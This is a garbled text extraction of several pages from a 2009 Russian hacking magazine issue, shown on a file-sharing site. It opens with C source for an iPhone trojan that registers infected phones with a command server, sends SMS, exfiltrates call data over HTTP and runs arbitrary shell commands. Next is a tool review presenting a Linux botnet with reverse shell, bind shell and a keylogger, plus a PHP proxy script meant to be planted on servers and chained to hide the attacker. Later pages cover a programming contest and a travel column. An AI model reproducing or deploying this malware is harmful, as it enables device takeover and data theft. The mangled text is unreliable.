Добавил:

Anonymhacker Опубликованный материал нарушает ваши авторские права? Сообщите нам.

Вуз:

Пензенский Государственный Университет

Предмет:

[НЕСОРТИРОВАННОЕ]

Файл:

126_Optimized

.pdf

Скачиваний:

Добавлен:

20.04.2024

Размер:

12.83 Mб

Скачать

☆

<<< < Предыдущая 1 2 3 4 5 6 78 / 158 9 10 11 12 13 14 15 > Следующая >>>

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
взломw				to	BUY
w Click				to
w Click									o	m
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ЗАРАЖЕННЫЙТЕЛЕФОНВЫПОЛНИЛСКРИПТ:	РЕЗУЛЬТАТВЫПОЛНЕНИЯНАЗАРАЖЕННОМТЕЛЕ-
#ECHO "FIRST"; ECHO "SECOND"; ECHO $((2+2))	ФОНЕСКРИПТА#DATE; UNAME –A

switch (i) {

case 0: l = 3; m = 101; break; case 1: l = 7; m = 107; break; case 2: l = 8; m = 3; break; case 3: l = 11; m = 9; break; case 4: l = 13; m = 71; break;

}

memcpy(k, &imei[l], 1); c = atoi(k); vkey+=c*m;

}

return vkey;

}

int regZombie(char* imei) { char* regurl[1024];

sprintf(regurl,"/master-server/reg. php?imei=%s&vkey=%d",imei, getVKey(imei));

sendHttpRequest("192.168.10.1",regurl); return 0;

}

MAIN()—ВСЕМУГОЛОВА

Осталосьсамаямалость— написатьглавнуюфункцию. Здесь мыбудемвциклеприниматьиобрабатыватьпришедшие командыотсервераи, взависимостиоткоманд, выполнятьте илииныедействия. Меньшеслов, большекода:

int doCmd(struct COMMAND COMMAND){

if (strstr(COMMAND.ct, "sm")!=NULL) { if (strlen(COMMAND.p1) > 0) {

if (strstr(COMMAND.p2, "getIMEI")!=NULL) { sendSMS(COMMAND.p1,getIMEI());

}

else if (strlen(COMMAND.p1)==1) {

//номер по умолчанию, использовался при

//записи видео-ролика для Х sendSMS("89100000000",COMMAND.p2);

}

else { sendSMS(COMMAND.p1,COMMAND.p2);

}

else if (strstr(COMMAND.ct, "at")!=NULL) { if (strlen(COMMAND.p1) > 0) {

char *res[1024];

sprintf(res, "%s",getCALL(COMMAND.p1)); if (strstr(COMMAND.rt, "sm")!=NULL) { if (strlen(COMMAND.r1)>0) {

sendSMS(COMMAND.r1,res);

}

	else if (strstr(COMMAND.rt, "ws")!=NULL) {
	if (strlen(COMMAND.r1)>NULL &&	DVD
	strlen(COMMAND.r2)>0) {	DVD
	char *urlres[1024];
	sprintf(urlres, "%s%s", COMMAND.r2,res);
	sendHttpRequest(COMMAND.r1,urlres);	dvd
	free(urlres);	• Рабочуюверсиюис-
	}	ходниковтынайдешь
	}	надиске.
	}
	}	• Новуюверсию
	else if (strstr(COMMAND.ct, "sh")!=NULL) {	серверадляботнета
	if (strlen(COMMAND.p1)>0){	тожеищинадиске.
	system(COMMAND.p1);
	}
	}
	else if (strstr(COMMAND.ct, "tg")!=NULL){
	if (strlen(COMMAND.p1)>0){
	timeout=atoi(COMMAND.p1);
	}
	}	HTTP://WWW
	return 0;	HTTP://WWW
	return 0;
	}
		links
	int main(int argc, char **argv) {	http://oxod.ru — мой
	regZombie(getIMEI());	блог. Пишупомере
	while(1) {	желания. Ждуком-
	sleep(timeout);	ментариев, отвечу
	COMMAND = takeCmd(1);	навопросы.
	doCmd(COMMAND);
	COMMAND = takeCmd(0);
	doCmd(COMMAND);
	}
	}

Нучто,всеоченьпростоиоткрыто.Самыйглавныйхаквэтомтро- яне—написаннаяправильнымиребятамиутилитаldid.Онапоз- воляетподписатьскомпиленныйбинарник,чтобыонзапускался нателефоне.Процедураэтауникальнадлякаждогоаппарата.Тут возникаетнеобходимостькопироватьэтуутилитуназараженный телефон,еслионанебылаустановленасамимвладельцемвмес- тескаким-нибудьпакетом.Ноэтоужеделотехникивнедрения.

Можетбыть,яещенапишуобэтомвследующейстатье…

ЗАКЛЮЧЕНИЕ

Всекогда-токончается. Вкусноепивоиссякает, интересные идеибезнадежноустаревают, мечтыматериализуютсяили уходятсамисобой, апроденьгиядаженеговорю. ВотиподошелкконцуциклстатейпоApple iPhone. Где-тобылоскучно, где-тонепонятно, что-тояупустил, что-тонедосмотрел— без этогоникуда. Надеюсь, тебебылаполезнаэтаипрошлыестатьицикла. Каквсегда, навсевопросыотвечаювблоге— http:// oxod.ru. z

WARNING

warning

Внимание! Информацияпредставлена исключительно сцельюознакомления! Ниавтор,

ниредакциязатвои действияответственностиненесут!

XÀÊÅÐ 06 /126/ 09

067

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY				>>m
w Click				to	BUY					взлом
w Click				to						взлом
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

ЛЕОНИД «R0ID» СТРОЙКОВ

/ R0ID@BK.RU /

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

>> взлом

ПРОГРАММЫ ДЛЯХАКЕРОВ

ПРОГРАММА:XBARV.1.2.0 ОС:*NIX/WIN

АВТОР:V01D

ЧУДО-ПЛАГИНДЛЯFF

Незнаю, какойизбраузеровтыюзаешь, нояв повседневнойработепривыкдоверятьFirefox. Однаизпричин— огромноеколичестворазнообразныхплагиновнавсеслучаижизни:). ИменнопоэтомухочупредставитьтебенезаменимыйплагинXbar v.1.2.0 отV01d'a, созданный дляпоискаMD5-хэшей, определенияPR/ТИЦ сайтовиобладающийфункциейReverseIP. ДляначалаинсталлируемдополнениекFirefox:

1.Сливаем плагин с нашего DVD

2.Запускаем Firefox

3.Открываем файл плагина (File -> open File -> xBar.xpi)

4.Ждем завершения установки

5.Ребутим браузер

Теперьприкаждомзапускебраузеравправом нижнемуглубудетдополнительнаяменюшка, состоящаяиздвухпунктов:

1.SEO

2.MD5

Начнемпопорядку. Кликаемпобатону«SEO» иснимаемгалочкусопции«Hide» — появится поледлявводаназваниядомена, покоторомумыполучимPR/ТИЦ, атакжеReverseIP.

Вбиваемдоменижмем«Enter». Черезпару секундпереднами— подробныйотчетсовсеми необходимымиданными. Придополнительном кликеназначке«+» рядомсIP-адресомсерве- раактивируетсяфункцияReverseIP. Онапозволяетпросмотретьсписоксайтов, хостящихсяна сервере. Ноэтоещеневсе, ибоестьвозможностьполучитьданныесразупонескольким доменам. Дляэтогозаходимвразделопций плагина, навкладке«General» снимаемгалкус пункта«Disable — Search from file» ивыбираем

068

файлсоспискомдоменов. Послеполучения результатовможноотпарситьсписокдоменов поданнымPR/ТИЦ.

ТеперьрассмотримфункциюпоискаMD5хэшей. C нейможноотправлятьхэшина www.milw0rm.com иwww.hashcracking.info,

причем, количествохэшейнеограничено. Алгоритмтвоихдействийпрост:

1.В разделе опций плагина, на вкладке «General» сними галку с пункта «Disable — Search from file»

2.Зайди на www.hashcracking.info и прими сертификат безопасности

3.Выбери файлик с хэшами и жми батон

4.Оцени результат в окне браузера

Пораподводитьитогифункциональности. Плагинпозволяет:

•Получать PR/ТИЦ ресурса

•Работать со списком доменов из файла

•Сортировать список сайтов в соответствии с результатами по PR/ТИЦ

•Производить ReverseIP

•Отправлять MD5-хэш на анализ прямо из браузера

•Отправлять на анализ сразу несколько MD5-хэшей из файла (очень удобно)

•Парсить MD5-хэши при загрузке из файла

•Искать MD5-хэши одновременно по двум ресурсам — www.milw0rm.com и www.hashcracking.info

Корочеговоря, всрочномпорядкеставимплагинидружноблагодаримV01d'a заочередной релиз!

ПРОГРАММА:HYBRIDREMOTE

ADMINISTRATIONSYSTEM ОС:LINUX

АВТОР:CSRSS

ВпрошлыхвыпускахХ-Тулзянеоднократновы- кладывалразличныесистемыудаленногоадминистрированияподВинду. Вэтотразяпорадую тебяпродуктомподсовершеннодругуюплатформу— Линух. Да-да, инаLinux'еможноподнять

LINUX-БОТНЕТ

ботнет… Кхм, очемэтоя? Кактыдогадался, под загадочнымопределением«системаудаленного администрирования» скрываетсямассаполезныхсофтин, помогающихуправлятьмножеством своих(инесовсемсвоих, апоройисовсемне своих) компов. Сейчасяхочупредставитьименно такуютулзу— «Hybrid Remote Administration System» отcsrss. Софтпредназначенисключи- тельнодляиспользованиянаLinux-платформеи включаетвсебя:

1. Áîò — Perl

2. Клиентская консоль — Perl::Gtk2

3. HTTP-админка на базе админ-панели

îò BlackEnergy (PHP/MySQL)

Ботобладаетнеплохимфункционалом:

• Connect Back shell (not encrypted)

— коннектбэк-шелл. Шифрование со-

единения отсутствует

• Bind shell, port: 6666 (not

encrypted) — бинд-шелл. Реализован

в виде отдельной утилы, управляе-

мой ботом; шифрование соединения

отсутствует

• Connect Back Encrypted keylogger

— кейлоггер. Записывает нажатие

клавиш, кодирует их алгоритмами

rot47&RC4 и в режиме реального вре-

мени отсылает на удаленную машину.

Обработка логов кейлоггера происхо-

дит при помощи клиентской консоли

• Encrypted Remote Terminal Emulator

(E.R.T.E) — аналог SSH, при помощи

которого бот устанавливает соедине-

ние с удаленной машиной. Все данные

кодируются (rot47&RC4), использует-

ся клиентская консоль.

XÀÊÅÐ 06 /126/ 09

hang

NOW!

BUY

>> взломw Click

BUY

w Click

-xcha

-x cha

Приступимкконфигурированиюсистемыуправления.Начнем,какводится,сбота.Открываем сорецботаиредактируемследующиестроки:

my $homeserver = "http://localhost/

exit;

}

Ипопробуемпостроитьцепочкупроксиков:

public/getcmd.php";	# получение
ботом команд			1. Заливаем pproxy.php на два раз-
my $defaultSleepTime = 10;		СОБСТВЕННЫЙПРОКСИК	ных удаленных сервера, например:
# таймаут, в случае отсутствия новых		СОБСТВЕННЫЙПРОКСИК	http://site1.com/proxy/pproxy.php è
команд			http://site2.com/proxy/pproxy.php
		всесложнее. Поройпроксиможетпонадобить-	2. Запускаем локальный скрипт со
Всорцеконсолиботавносимизмененияв		сявсамыйнеподходящиймомент… таккакже	следующими параметрами:
параметры:		быть? Выхододин— иметьподрукойсобствен-	perl plocal.pl -px http://site1.com/
		ныйпроксик, готовыйвлюбуюминутуобслужить	proxy/pproxy.php perl plocal.pl -px
my $server_host = "127.0.0.1";		тебя:). Причем, прощевсегобудетподнятьне	http://site2.com/proxy/pproxy.php
# хост, на котором находится бот (не-		Bouncer или3proxy, аPproxy, окоторомятебе	-tpx http://localhost:8008 -bp 8009
обходимо для E.R.T.E)		сейчасрасскажу. ТулзапредставляетсобойPHP-	3. Пускаем браузер на порт 8009
my $pass = "1"; # RC4 пасс (необходи-		проксик, состоящийиздвухчастей— удаленной	4. Схема цепочки такова: localhost
ìî äëÿ E.R.T.E & Keylogger)		(pproxy.php) илокальной(plocal.pl). Налокалхос-	-> site1.com -> site2.com -> target
my $MAXLEN = 1024;		тезапускаетсяперловаячасть, прослушиваю-
my $LISTEN_PORT	= 666;	щаяпорт, накоторыйнатравливаетсябраузер,	Аналогичнымобразомможносоставлятьиболее
# порт, на который бот шлет данные		асамPHP-проксизаливаетсянакакой-нибудь	длинныецепочки. Однаконезабывайпрологи
my $SEND_PORT = 555;	# ïîðò, êîòî-	сервер.	web-сервера. Внихможнобудеттебяотыскать.
рый бот будет прослушивать		ИспользоватьPproxy довольнопросто:
			ПРОГРАММА:FORUMDETECTOR
Модифицируемhttp-админкунабазеадминкиот		1. Сначала заливаем pproxy.php на	ОС:*NIX/WIN
BlackEnergy:		удаленный сервер, например, http://	АВТОР:DX
		site.com/proxy/pproxy.php
$prot = 0; // используем логин или		2. Затем запускаем локальный скрипт:
íåò? 0 — FALSE, 1 — TRUE		perl plocal.pl -px http://site.com/
$name='cfcd208495d565ef66e7dff9f98		proxy/pproxy.php
764da'; // md5, username, (0)		3. После этого по дефолту открывает-
$pass='cfcd208495d565ef66e7dff9f98		ся порт 8008, через который и следу-
764da'; // md5, password (0)		ет пускать браузер
$host = "localhost"; // MySQL-õîñò
$user = "root"; // MySQL user		Сорецpproxy.php оченькомпактениможетбыть	ОПРЕДЕЛЯЕМДВИЖОКФОРУМА
$pass = ""; //MySQL user password		запростодобавленвтелоконтентасайта:
$db = "stats"; //название БД
$table = "bots"; //название таблички		<?php	Напоследокпредставлютебеочередной
var $timeout = 600; //время нахож-		//$secret = 'pproxypass';	релизотdx — Forum Detector. Утилапред-
дения бота в БД, после истечения		if(isset($_POST['query']) &&	назначенадляопределениятипаиверсии
указанного времени бот автоматически		isset($_POST['host']))	указанногофорума, чтоособеннополезнопри
удаляется, если не дал о себе знать		{	поискесплойтовподразличныефорумные
		if(isset($secret) && ($_	движки. Наданныймоменттулзаподдержи-
Вадминкетыможешьнаблюдатьследующие		POST['secret'] != $secret))exit;	ваетнесколькосамыхизвестныхфорумов,
поля:		header('Content-type:	средикоторых— IPB, phpBB, vBulletin, MyBB
		application/octet-stream');	последнихверсий.
• [E.R.T.E.] — команда		@set_time_limit(0);	Извозможностейскриптаследуетотметить:
• [L.Port] — Local Port — локаль-		$query = base64_decode(str_
ный порт, на который бот будет слать		replace(" ", "+", $_POST['query']));	• Определение типа форума (распозна-
данные		list($host, $port) = explode(':',	вание IPB, phpBB, vBulletin, MyBB)
• [L.Host] — Local Host — наш IP-адрес		base64_decode(str_replace(" ", "+",	• Определение версии движка форума
• [Key] — RC4 пароль		$_POST['host'])));	по разным критериям
• [R.Port] — Remote Port — удаленный		if(!$port)$port = 80;	• Определение возможных уязвимостей
порт, который прослушивает бот		$ip = gethostbyname($host);	движка форума и поиск подходящих для
		if($fp = @fsockopen($ip, $port,	них сплойтов
Вобщем, поюзайсамостоятельно. Тольконе		$errno, $errstr, 20))	• Определение ТиЦ и PR сайта, на ко-
забывай, чтотыужевзрослыйизавсесвои		{	тором установлен форум
действияответственностьнесешьсам.		fwrite($fp, $query);	• Наличие поддержки работы через
		while(!feof($fp))	прокси/socks5/прокси с авторизаци-
ПРОГРАММА:PPROXY		{	ей/socks5 с авторизацией
ОС:*NIX/WIN		$answer = fread($fp, 1024);
АВТОР: BONSI		echo $answer;	Конечно,утиласплойтзатебянезапустити
Потребностьвпрокси/соксахвозникаетпосто-		}	веб-шеллнасервернезальет.Ноеслитырешил
янно. Проблемавтом, чтонайтистабильныйи		fclose($fp);	протестироватьпарочку-другуюинтересных
качественныйсервисскаждымднемстановится		}	форумов—тулзавэтомпоможет.z
XÀÊÅÐ 06 /126/ 09			069

				hang		e
			C			e	E
		X					E
	-							d
	F									t
	D									i
	D									r
P						NOW!				o
P
					BUY					>>m
w Click				to	BUY						сцена
w Click				to							сцена
w
	w									o
	.								.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

BATTLE OF THEBRAINS

ОТЧЕТСФИНАЛАACM ICPC 2009

21 апреля2009 годатрисотнилучшихмолодыхматематиковипрограммистов собралисьвСтокгольмедляучастиявфиналеЧемпионатамирапоспортивномупрограммированиюACM ICPC, главнымспонсоромкотороговыступаетIBM. ПоприглашениюэтойзамечательнойкомпаниияиотправилсявШвецию, чтобысвоимиглазамиувидетьбитвулучшихмолодыхумовпланеты.

«Длярешениясерьезныхпроблемнужны величайшие, уверенныевсвоихспособностях умы, способныепредложитьнестандартныерешения, — считаетдокторБиллПаучер (Bill Poucher), профессорУниверситета Бэйлор(Baylor University) иисполнительный директорчемпионатаICPC. — Ихможно назватьатлетамиинноваций. Онивыходятза рамкиограниченийиполучаютудовольствие, делаяэтуработу».

Чтоговорить, спортивноепрограммирование

— штукаоченьспецифичная, стоящая особнякомоттого, чтобольшинстволюдейвообще привыклипониматьподпрограммированием. Задачи, которыеставятсянасоревнованиях поспортивному программированию, несут

всебе, главнымобразом, математические

иалгоритмическиевопросы. Спортивное программированиепредъявляеткучастникам соревнованийвысочайшиетребованияв областиматематическойподготовки, команднойработыинавыковбыстрогоичистого программирования.

Любаяпроблемаздесь, какбыонанибыла подана, всегдаупираетсявсоставление математическихмоделейирешениематематическихзадач. Решений«напальцах» не бывает: дажееслизадачкуиможно решить тупымперебором, такоерешениенепройдет поограничениям наресурсы— длякаждого заданиясуществуютпороговыезначенияпо используемойпамятиивременивыполнения.

Участники

ВэтомгодупредставлятьРоссиюпоехали8 команд: ИТМО(чемпионыпрошлогогода), СаратовскийГУ(чемпионыРоссииэтого года), МГУ, АлтайскийГУ, НовосибирскийГУ, СПБГУ, УральскийиЮжно-УральскийГУ. Такжесредиучастниковбылитакиеизвестные вузыкакMIT, Стэнфорд, Оксфорд, ВаршавскийУниверситет, УниверситетКарнегиМеллонаиЦиньхуа. Предматчевыерасклады былипростые: командаИТМОприехала отстаиватьстатусЧемпионовмира, авсе остальныеприехалимешатьимэтосделать:).

Такженамечалосьинтересноероссийско-ки- тайскоепротивостояние: отКитаятрадиционноприехалонемалосильныхкоманд, готовых боротьсязасамыевысокиеместа.

Соревнованияиитоги

Непосредственнофинальныесоревнования проходиливKTH – КоролевскомтехнологическомуниверситетеСтокгольма. Ировнов9 утра21 апрелябылданстартсоревнованиям. В этом году участникам было предложено 11 задач, наиболее простой из которых оказалась задачка с индексом «А»: ее решили очень быстро и для большинства команд именно она была первой решенной задачей.

За 5 часов соревнований было решено 9 из 11 задач: это смогли сделать две команды

— ИТМО и Университет Цинхуа. Победителя определили по затраченному времени: показав результат в 1381 минут второй раз подряд Чемпионами мира стали ребята из ИТМО!

070	XÀÊÅÐ 06 /126/ 09

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
>> сценаw Click					BUY
				to	BUY					m
				to						m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

Задача «А»: Осторожный подход

Представь себя авиадиспетчером и что тебе надо составить максимально безопасное расписание посадок самолетов в аэропорту. Права на ошибку нет: на кону жизни людей.

Считается, что чем больше промежуток между посадками в расписании, тем безопаснее они проходят. Ведь у пилотов есть больше времени, чтобы правильно отреагировать на любые возможные изменения и проблемы.

Êсчастью, частично эта проблема уже автоматизирована, и именно тут ты должен вступить в работу.

Для каждого из самолетов тебе будет даваться временной диапазон, в течение которого он может приземлиться. На основе этих данных ты должен создать расписание посадки самолетов. Посадки должны быть максимально разнесены по времени, чтобы минимальный промежуток между ними был как можно больше.

Êпримеру, если есть три самолета с посадками 10:00am, 10:05am и 10:15am, то минимальный промежуток между посадками составляет 5 минут: между первыми двумя. Промежутки в расписании посадок не должны быть одинаковыми — но самый маленький из них должен быть как можно больше.

Входные данные:

Input-файл состоит из нескольких тестовых случаев, описывающих разные исходные сценарии. Каждый тестовый случай начинается с цифры n (2<=n<=8), обозначающей количество самолетов в сценарии. Далее следует n линий, каждая из которых содержит два числа [ai, bi] — временной диапазон, в течение которого i-й самолет может приземлиться. Числа ai, bi указываются в минутах и находятся в таком диапазоне: 0 ? ai ? bi ? 1440. Заканчивается входной файл строкой «0».

Выходные данные:

Для каждого тестового случая нужно вывести минимальное время между двумя посадками в оптимальном расписании (когда минимальное время максимально).

XÀÊÅÐ 06 /126/ 09

071

				hang		e
			C			e	E
		X					E
	-							d
	F									t
	D									i
	D									r
P						NOW!				o
P
					BUY					>>m
w Click				to	BUY						сцена
w Click				to							сцена
w
	w									o
	.								.c
		p					g
			df			n		e
				-xcha

HTTP://WWW

links

•icpc.baylor.edu —

официальныйсайт чемпионата. Тутты можешьпосмотреть фотоивидео-архив, скачатьзаданияс предыдущихсоревнованийиполучить любую другуюинформациюо чемпионате.

•www.snarknews.info

—новостироссийских имеждународных чемпионатовпо программированию.

•www.topcoder.com

—сайт«сольного» соревнованиядля программистов.

•www.opencup.ru —

открытыйчемпионат МГУпопрограммированию.

•google.com/

codejam — чемпио-

натcodejam, который проводит google.

• acm.timus.ru — сайт УРГУ, посвященный олимпиадампо программированию. Тут размещен выдающийсяархив задачипроверяющая система.

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

DVD

dvd

Нанашемдискеты найдешьзадачи этогогода, атакже подборкуфотографий сфиналаACM ICPC 2009 вСтокгольме.

072	XÀÊÅÐ 06 /126/ 09

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

ФИНАЛЬНЫЕРЕЗУЛЬТАТЫ

МЕСТО	НАЗВАНИЕВУЗА	РЕШЕНО	ВРЕМЯ

1	УНИВЕРСИТЕТИТ, МЕХАНИКИИ	9	1381
	ОПТИКИ(САНКТ-ПЕТЕРБУРГ)

2	TSINGHUA UNIVERSITY	9	1800

3	САНКТ-ПЕТЕРБУРГСКИЙГУ	8	1176

4	САРАТОВСКИЙГУ	8	1305

5	UNIVERSITY OF OXFORD	7	998

6	ZHEJIANG UNIVERSITY	7	1117

7	MASSACHUSETTS INSTITUTE OF	7	1143
	TECHNOLOGY

8	АЛТАЙСКИЙГУ	7	1254

9	UNIVERSITY OF WARSAW	7	1413

10	UNIVERSITY OF WATERLOO	6	787

11	I. JAVAKHISHVILI TBILISI STATE	6	933
	UNIVERSITY

12	CARNEGIE MELLON UNIVERSITY	6	1045

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
сценаw				to	BUY
w Click				to
w Click									o	m
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

XÀÊÅÐ 06 /126/ 09

073

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY				>>m
w Click				to	BUY					сцена
w Click				to						сцена
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

КРИС КАСПЕРСКИ

ЧТОСЛУЧИЛОСЬ СКРИСОМ?

ВсяправдаонастоящемибудущемКрисаКасперски

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

Почтовыйсерверредакцииzуженесколькомесяцевтрещитподнатиском писемстемой«КрисКасперски». Читателеймучаютвопросы: «Чтослучилось смыщъх’ом?», «Будетлионсноваписатьстатьи?». Сначаламыотвечали, что тепятьдесяткустовдурмана, которыерослиунегонаделянке, погубилураган, иприходабольшенет. Затем— чтоего, сзеркалкойикитайскимпаспортом, принялиспецслужбынатерриторииамериканскогопосольствавСеуле.

ВСТУПИТЕЛЬНОЕ	(компанияEndeavor Security, кудапервона-	- Нет, у меня есть кошка,- сказала
СЛОВОРЕДАКЦИИ	чальноустроилсямыщъх, теперьявляется	Алиса. — Ее зовут...
Сейчасмыоткроемстрашнуютайну: что	частьюэтойкорпорации);	- Прекрасно! — обрадовался Грифон.
же, насамомделе, случилось... Вынуждены	• ездитсдокладамипохакерскимконферен-	— Давно пора тебе рассказать нам о
признаться, послеоднойизредколлегий	циям;	себе и о своих приключениях!
нампришлосьусыпитьКриса(спомощью	• ведетсразличнымииздательствамипере-	ЛьюисКэрролл. «АлисавСтранечудес»
двухсексапильныхблизняшек, подогнанных	говорыпопереводуиизданиюсвоихкнигза
Андрюшком) иотдатьнаопытывлабораторию	рубежом;	Дапростятмнечитателинекоторуюсумбур-
экспериментальноймедицины, чтобывыпла-	• судитсяспосольствомЮжнойАфрики;	ностьповествования. Этистрокипишутсяиз
титьдолгпередфинскойтипографией(факен	• егохвостсворачиваетсявиврит, посколькув	далекойизагадочнойМалайзии— страны
кризис!).	ИзраилеуКрисатожекипятмажорныедела.	самобытнойэкзотики, роскошныхпесчаных
It’s a joke, амиго, неволнуйся:). Вдействитель-	Кактыпонимаешь, всеэтоотнимаетневероят-	пляжейивосточногоколорита. Мыслискачут
ности, Крискрутитсяповсемупериметрутак,	ноеколичествовремениисил, ноонпланирует	сайгакамипоколдобинам, отизбыткавпе-
чтодымизушейидет:	вновьписатьвz, ивоттомуподтверждение.	чатленийтопорщитсяшерсть, ихвоствстает
• работаетнезависимымконсультантомв		дыбом, потомукакпотрясающекрасивых
подразделенииMcAfee, сотрудникикоторого	- У тебя есть свой конек?! — спросил	девушекздесьбольше, чембуддистских
занимаютсяразработкойHIPS/IPS-систем	Деликатес.	монахов, предлагающихпроголосоватьза

074	XÀÊÅÐ 06 /126/ 09

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
>> сценаw Click					BUY
				to	BUY					m
				to						m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

Окрестности моей норы

Мыщъх за компом

мир, причемодинголосстоитнеменьше сотнирентген, атоидвести. Нанашиденьги

— 7500 рублей. Дорогоймир, однако.

ЛЕНИВЫЕМАЛАЙЦЫ

Большойнеожиданностьюоказалсядляменя
ужасающийхолод,вынуждающийтаскатьссобой
свитер.Иэтопри35градусахпоЦельсию!Ну,в	А все почему? Преступлений что ли меньше?
тени35,авовсехостальныхместахпонатыканы	Так ведь ни хвоста! Карманы и барсетки
кондиционеры,работающиенаполнуюмощность.	режут прямо в центральных аэропортах. Бай-
Толькоиищешь,гдебысогреться.Иещеищешь,	керы срывают сумки на ходу. Гопы сначала
чегобызаточить.Малайскаяедавкусная,дешевая	бьют по голове, а уже потом смотрят, что в
(яблочныйсокдорожеобеда),носовершенноне	карманах у жертвы. Криминальная хроника в
калорийная,апотомубыстропереваривающаяся.	газетах — вообще кошмар на улице Вязов. И
Девушкиздесьцветарадуги—яркиеодежды,	зачем только я ее читал перед тем, как сюда
пестрыекраски.ПрактическивсечитаютКоран	поехать?! Первый день провел на конкретной
иходятвплатках,исамималайцыжалуютсяна	измене, ожидая подвоха, но потом махнул
то,чтоподюбкукнимтакпростонеполазишь.Ну,	хвостом. В многомиллионной Куала-Лумпур,
насчет«неполазишь»онислегкапогорячились.	конечно же, не обходится без преступлений.
Этоонисравниваютмалаексамериканками,	Вот только никто не делает из этого трагедии
которыхвиделитолькопотелевизоруиокоторых	мирового масштаба и не живет в посто-
товарищи,побывавшиевАмерике,рассказывают	янном страхе, что сейчас ограбят, убьют,
всякиебайки,какзападныеженщиныготовылечь	изнасилуют и даже имени не спросят. Не, на
подпервоговстречного.Малайцыслишкомле-	самом деле меня тут едва не изнасиловали.
нивые,чтобыухаживать.Адевушкитут…такиеже,	И руку на грудь клали, и за хвост хватали, и
какивезде,особенноеслиучесть,чтомалайцевв	только когда она поняла, что ей с подругой
Малайзиинетакужимного.Туристов—кудаболь-	ничего не обломится, натуральным обра-
ше.Китаянки,японки…приветливые,открытыеи	зом выставила за дверь. А дверь эта была
общительные.Американскиедевушкитакжелегко	в деревне. И такси там поймать нереально.
идутнаконтакт,особенновместахвынужденного	Общественный транспорт ходит по непонят-
заключения,типааэропортовипрочихдомов	ным траекториям. Благо, хоть Twin-Towers
терпимости.Легкость,скоторойонипереходятна	(небоскребы «Башни Близнецы Петронас»)
обсуждениеличныхпроблем,простопоражает,	были видны, и мыщъх, как дурак, шел по
но…этововсенезначит,чтознакомствополучит	азимуту четыре часа, пока не добрался до
продолжение.Знакомство—этоодно,аникчему	цивилизации. И все время думал: ну вот,
необязывающаябеседа—совсемдругое.	сейчас ограбят, убьют, изнасилуют. Так ведь
ОГРАБЯТ, УБЬЮТ,	нет! Не ограбили, не убили, не изнасило-
ОГРАБЯТ, УБЬЮТ,	вали. Малайзия в этом плане интересная
ИЗНАСИЛУЮТ	страна. За наркотики приговаривают к смер-
Вообще говоря, люди здесь удивительно дру-	тной казни, но все как бы в теме, и у всех есть
желюбные, привыкли улыбаться и общаться.	«very special stuff, not a drug». И вот сидим

мы, значит, в чулане у раджи, прямо на обочине свальной борозды, долбим этот «not a drug» и говорим за все дела. Кстати, индусы к малайкам абсолютно параллельны. Они на них насмотрелись, им латинок подавай.

ВОТЕЛЕ, НАТОПЧАНЕ

Самималайцытолькоорусскихдевушкахи говорят, хотямногиеихникогданевидели. Оно, конечно, понятно. Русскиедляних— экзотика, асамыекрасивые— этоеврейки, причемсавтоматом. Девушкасоружиемврукахвыглядит сексуально, особенноеслионатолькопосле армии(вИзраилевседевушкислужат) исо спортивнойподготовкойунеевсевпорядке. Гуляешьстакойпоночномугородуичувствуешьсебявполнойбезопасности.

Еврейкимыщъхунастолькопонравились, что ондаженискемнепереспал. Икакэтоятак отличился, непонимаю… Хотя, скореевсего, это связаноссильнойусталостью. Яжесюданена отдыхприехал, анаработу. Квечерунастолько выматываюсь, чтосилхватаеттольконато, чтобы посидетьсколлегамивресторане, послечего вернутьсявотельизавалитьсянатопчан. Натуральныйтакойтопчан. Накоторыйидевушку-то пригласитьстыдно. Аещеназывается«хороший отель», гденавторойденьполовыестащили своежесобственноепокрывалоипришлось долгоразбиратьсясменеджером, нахвостаони этосделали. Унасвотелях, конечно, тожеворуют, новоруютосмысленноипопонятиям.

Затоунихможноспокойнопосидетьсдевушкойвоченьдорогомресторанезаеесчет.

XÀÊÅÐ 06 /126/ 09

075

NOW!

>>m

BUY

сцена

Click

-xcha

